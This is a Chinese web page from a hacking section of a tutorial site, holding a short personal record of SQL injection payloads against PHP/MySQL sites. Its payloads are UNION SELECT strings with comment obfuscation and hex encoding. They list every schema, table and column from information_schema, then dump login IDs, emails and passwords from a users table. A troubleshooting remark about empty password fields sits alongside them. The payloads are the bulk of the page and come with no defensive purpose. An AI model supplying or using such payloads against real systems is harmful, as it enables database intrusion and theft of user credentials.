手机
当前位置:查字典教程网 >网络安全 >黑客入侵 >php 注入 记录一下
php 注入 记录一下
摘要:暴库名\表名\列名/**/union/**/select/**/unhex(hex(concat(0x1e,0x1e,table_schem...

暴库名\表名\列名

/**/union/**/select/**/unhex(hex(concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)))+FROM+information_sch

ema.columns+WHERE+table_schema!=0x696e666f726d6174696f6e5f736368656d61+LIMIT+N,1--

碰到一个字段暴不出来,问了下trace,找到了原因,是因为用户名字段是9个,但是密码字段只有4个是有值的,所以暴不出来,改了下语句可以了.

union+select+count(pasd)+from+users--

+union+select+concat(loginID,0x3a,email,0x3a,pasd)+from+users+where+length(pasd)>0+limit+N,1--

或者冰的原点提供的

/union/**/select/**/unhex(hex(group_concat(loginID,0x3a,pasd)))+FROM+users--

【php 注入 记录一下】相关文章:

请注意入侵过程中的细节(三)(图)

serv_u提权记录: 530 Not logged in, home directory does not exist

别轻易用现成的[U盘启动制作工具] 盗版风险大害你没商量

怎样在CentOS上配置基于主机的入侵检测系统?

手动mysql 高级注入实例分析

入侵过程中的简单任务

SQL注入原理介绍

MSSQL2005注入攻击

看我来入侵复旦大学(图)

从注册表切断一切黑客入侵的路径

精品推荐
分类导航